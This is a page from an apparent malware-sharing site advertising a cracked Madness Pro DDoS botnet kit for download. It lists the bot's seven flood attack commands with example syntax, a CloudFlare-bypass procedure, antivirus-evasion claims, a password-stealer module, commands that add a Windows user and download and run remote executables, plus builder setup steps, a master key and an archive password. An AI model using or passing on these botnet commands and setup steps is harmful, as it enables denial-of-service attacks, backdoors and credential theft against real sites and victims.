banner 1




Freetrojanbotnet.com the final database of trojans, botnets, viruses, worms, exploits .... and a great resource for vulnerability researchers and security professionals. Our purpose is to gather submissions from operators and various mailing lists and concentrate them in a database easy to navigate. This was written solely for educational purposes. Use it at your own risk. The author will not be liable for any damages.



[ Important Info ]

Verified Verified


[ Detailed Information ]

Full title Madness Pro DDoS Bot v1.13 --- v1.14 ---v1.31 (Crack)
Date add 09-02-2015
Category Bots "Click Show ALL"
Risk
Description

Madness Pro DDoS Bot v1.13 --- v1.14 ---v1.31 (Crack)

Madness Pro DDoS Bot v1.13 Cracked - Builder by NoNh

 Madness Pro DDoS Bot v1.13 Builder by NoNh

  freetrojanbotnet.com

Madness PRO

History :

In the summer of 2012 we started thinking about creating a fundamentally new DDoS
bot to test their own web resources on the fault-tolerance, since none of the systems
tested did not deserve to even estimate "4".

The test samples during devoured memory load on the CPU local machine flew with
errors, freezes on 50 % capacity CPU, making wrong entries in the registry , causing
activation of protective systems , many weighty error was found in the control panels.
To create your own system, we have studied in detail : BlackEnergy ( source code ),
gbot ( disassembling ), DirtJumper ( disassembling ), Darkness Optima ( source code,
purchased under the contract ), iBot ( source code , purchased under the contract ),
w3Bot ( source) , were also studied the source code of Zeus and many other programs.

capabilities
- Written in C + +, easily crypt is lightweight (compressed sample < 15KB )
- Full compatibility with all Windows family of NT (x86 and x64)
- Boat has 7 types of attacks
- Stability in the system. Indicators load on the CPU and RAM are very uniform .
- Do not attracted the attention of UAC and Windows Firewall
- Able to establish port, referal and cookies individually for each goal
- Supports up to 10 targets simultaneously
- Has a very low load on the CPU with the new , complex system of parsing commands
  (all analogs parsing takes place inside a function in multiple threads - it's extra work
  load on the processor . New bot enters all data in the array before the attack on the
  function and come ready options address, port , referral , etc.)
- Has an enormous power output of more than 1500 http ( and more 30000 UDP)
  queries per minute through direct interaction with the network drivers , even on
  desktop Windows! (only using WinSock) is about 10 times more than some few
  analogs and more top ( on this parameter ) competitors.
- In the control panel are : the number of requests per minute , right in the system,
  the version of the system.
- Supports bypass CloudFlare protection ( !) And many other more common.
- Supports Slow GET and Slow POST modes !
- In the packet header specifies disabling the cache (Cache-Control: no-cache),
  which increases the load on the server .
- The protection of dialogue bot panel spetsklyuchem


Detection:
checking build (without crypt and packaging ), only 3 out of all the anti-virus gave a
suspicion (AVIRA, ClamAV, VBA32). During the test key local AV : Kaspersky, Nod32,
DrWeb, Avast missed a file in 100 % of cases.

Modes of attack and the team
Since the system is a professional syntax commands that look like Darkness.

dd1 basic mode of operation via HTTP protocol using GET, using sokkety.
Supports *** cookies and $ $ $ ref and allows for up to 10 targets simultaneously (separated by " ;").
The fastest search volume attack.
Example : dd1 = http://ya.ru *** cookies $ $ $ referal; http://mail.ru *** cookies2 $ $ $ referal2

dd2 same treatment as dd1, only the method POST.
Added optional parameter @ @ @ post_data.
It is also support for up to 10 targets.
Example : dd2 = http://forum.ru/index.php *** cookies $ $ $ referal @ @ @ login = yyy & password = hhh

dd3 attack on the HTTP GET method using a system library WinInet.dll.
Good old attack that is used in many Delphi bots .
Slow due to the limitations of Microsoft Windows.
Does not support referral and cookies , supports up to 10 targets.
Example : dd3 = http://host.com/script.php

dd4 attack via HTTP POST method using the system library WinInet. Same as dd3, only POST. Example:
dd4 = http://host.com/script.php @ @ @ @ @ @ login = yyy & password = hhh

dd5 ICMP attack ( pings ) . Supports up to 10 targets.
Example dd5 = 198.168.0.1; 199.0.0.1

dd6 UDP attack . Supports up to 10 targets . Required parameters : port , and text.
Example : dd6 = 192.168.0.2:27015 @ @ @ flud_text

dd7 attack on the HTTP GET method using a system library URMON.dll
Average speed attack that supports up to 10 targets and do not support cookies and referal

cfa command to bypass the protection CloudFlare (!). ONLY used during dd7.
Not ostavnavlivaet the command dd7.
The point is simple
The bot executes java script gets the desired cookie and believes CloudFlare requests made by authorized dd7.
Example : dd7 = http://site.ru/index.php, then (after fifteen minutes ) cfa = http://site.ru/index.php

cmd command is executed on the command interpreter cmd.exe on the local machine.
Does not stop the execution of other commands.
Example : cmd = net user goodwin / add

exe command to load and run the EXE file.
Does not stop the execution of other commands.
The file is saved under the same name, under which he had been on the internet.
Made three attempts to download the file.
Example : exe = http://site.com/filename.exe

Control Panel :
We used a 70% modified of another product (purchased under a contract for change and resale )
 by rewriting it almost completely, as it was found too many mistakes and did not like the code . 
Of course everything was corrected and optimized - New PU Enjoy !




Protection bypass CloudFlare.

CloudFlare security complex is based on the determination of the browser by running Java script in it,
after which the client is issued a unique cookies.
Both, like the browser can theoretically run Java Script . The great difficulty is to fit the required amount
of mathematical functions in the modest size of the build bot , however, some instances of coping with the task !
Consider the example of a test server http://server.com, protected by CloudFlare complex + + Madness 1.08:
1) A botnet command is given dd7 = http://server.com, then start rekvest to the server using the system library UrlMon.
As can be seen on the server logs and sniffer , 302 bots error is returned , which means job security .

2) A botnet command is given cga = http://server.com cookies and bots request for authorization.
Java script executing each bot has a unique (for its ip and useragent) cookie which immediately includes the packet header.
According to the logs can be seen that the requests to the server are in normal mode and returns the content of the website
 corresponds to the content on it!

Q) Why can not I do it automatically?
A) Depending on the security settings, cookie can be changed in an arbitrary interval and authorization need to go again.
So far, the automation can not cope with it as it makes a person a professional . Too frequent inspection interval greatly
reduces the usability of the site , as ordinary users see every single swing CloudFlare seconds.

Q) Can I use this method all the time, for any purpose ?
A) It is possible, but not recommended. Since dd7 itself is a slow attack , compared with dd1, and then there's the load is
increased due to the preparation of the special package to bypass the protection .


------------------------------------------------------------------------------------------------------------------------------
Note : inc\config.php has to be writeable
Note 2 : Panel is modded Darkness (Optima) by myself (no RU language), if you have original one for madness please send it over ... 

Madness Pro DDoS Bot v1.14 Cracked

Slowloris & SBY

Panel not updated (Do it yourself) :

DDOS commands :

def
cfa
dc1
ds1
dd1
dd2
dd3
dd4
dd5
dd6
dd7
 

Madness DDoS PRO 1.31 (password module incl.) [Cracked by freetrojanbotnet.com]

Features
- Written in c + +, easily crypt is lightweight (compressed sample <15KB)
- Full compatibility with all windows family (x86 and x64)
- Bot has 7 types of attacks
- Extremely stable system. Load on CPU and ram is very powerful.
- does not attract attention to UAC Windows Firewall
- can install port, referal and cookies individually for each attack
- Supports up to 10 targets simultaneously
- has a very low load on the cpu with the new, complex system parsing Teams (all analogs parsing passes within a function in multiple threads
- it's extra work load on the processor. New bot enters all data in the array before the attack and come ready function parameters

: address, port, referral, etc.)
- has enormous power output of more than 1500 http (and more 30,000 udp) requests per minute due to direct

interaction with network drivers, even on Windows Desktop! (Only when using winsock) is about 10 times more than

some analogues and several more top (on this indicator) competitors.
- in the control panel are: the number of requests per minute, right in the system, the version of the system. -

Supports bypassing Cloudflare protection (!) and many other, more simple.
- support and slow get slow post! mode
- indicated in the packet header off the cache (cache-control: no-cache), which increases the load on the server.
- Bot protection of panel.

Modules:
- PassGrabber (stealer): this module find and decrypt passwords. 26 software units supported (on octouber 2014).
price $150 for base licence, $250 for lite licence, free for full.


Detection:
Validation build (without crypt and packing) only 3 AV’s of all triggered suspicion (avira, clamav, vba32). during local tests Kaspersky, nNod32, Drweb, Avast all missed file in 100% of cases.


Attack modes and commands:
As the system is a professional syntax with commands, this seems complicated, but only at first glance =)
• dd1 basic operation by http protocol method get, using sokkety. support *** cookies and $ $ $ ref and allows up to 10 targets simultaneously (separated by ";"). the fastest search volume attack. Example: DD1 = http://ya.ru cookies *** $ $ $ referal; http://mail.ru cookies2 *** $ $ $ referal2
• dd2 the same treatment as dd1, only the method of post. added optional parameter @ @ @ post_data. also supports up to 10 goals. Example: dd2 =http://forum.ru/index.php *** cookies $ $ $ referal @ @ @ login = yyy & password = hhh, this team posted a username and password yyy hhh a script

• dd3 attack http get method using the system library wininet.dll. good old attack used in many delphi bots. slow due to the limitations of desktop windows. not support the referral and cookies, supports up to 10 targets. Example: dd3 = http://host.com/script.php
• dd4 attack http post method using the system library wininet. the same as dd3, only post. Example:
DD4 = @ @ @ http://host.com/script.php @ @ @ = login & password = yyy hhh
• dd5 icmp attack (pings). supports up to 10 targets. Example dd5 = 198.168.0.1; 199.0.0.1
• dd6 udp attack. supports up to 10 targets. mandatory parameters: port and text. Example: dd6 = 192.168.0.2:27015 @ @ @ flud_text
• dd7 attack http get method using the system library urmon.dll average speed attack, supports up to 10 targets and does not support cookies and referal
• cfa command bypass the security cloudflare (!). used only during dd7. This is simple - the bot executes java script gets the desired cookie and cloudflare considers requests made dd7 authorized. Example: dd7 = http://site.ru/index.php, then (after fifteen minutes) cfa = http://site.ru/index.php
• cmd command is executed on the command interpreter cmd.exe on the local machine. does not stop the execution of other commands. Example: cmd = net user goodwin / add
• exe command to load and run the exe file. does not stop the execution of other commands. file will be saved under the same name, under which he was on the Internet. made three attempts to download a file. Example: exe = http://site.com/filename.exe

Control Panel:
We used a modified ~ 70% from another complex (purchased under agreements to resell and change), rewriting it almost completely, as it was found too many mistakes and did not like the code. Naturally everything was corrected and optimized - new pu you like it!


Demonstration:
how well the system is very powerful and to demonstrate the need 15-20 bots, which are always available - Sellers will try to demonstrate power.


Prices:
- Test License $0 (only for checking the forums and testers. updates not provided)
- Lite Licence $300 (update/rebuild $100, upgrade to the new version $ 100)
- Basic License $500 (Update / Rebuild $ 50 upgrade to the new version $ 100, the price of the modules will be installed later)
- full license $950 (all updates Rebuild and modules are free)


INSTRUCTIONS:
1) Setup panel, read the howto included. (PS: Your MasterKey is: 0x2222)
2) Open the builder (do not open "madnesscracked.exe)
3) Write in URL in the builder, the url are usually http://yourdomain.com/index.php
4) Click Update URL, should display a messagebox that the url has been changed.
5) Your file is madnesscracked.exe (after you update url)

Password freetrojanbotnet.com


Download Please LOGIN to download
Download 2 Please LOGIN to download
Download (VIP MEMBERS ONLY) Only vip members able to download

Terms of use of comments:
  • Users are forbidden to exchange personal contact details
  • Haggle on other sites\projects is forbidden
  • Reselling is forbidden
Punishment: permanent block of user account with all Gold.



Comments

Whats Password Files?

freetrojanbotnet.com

Add new comment



Free Share Trojans, Viruses, Botnets, Worms, keylog, Crypter, exploits 0day, andromeda bot crack, betabot crack ,Zeus bot.

Buy Sell (Trojans, Viruses, Botnets, Worms, keylog, Crypter, exploits 0 day, exploits zero..........)
Send all submissions to [email protected] freetrojanbotnet[at]gmail.com [gpg]
Copyright © 2008-2014 Virus Team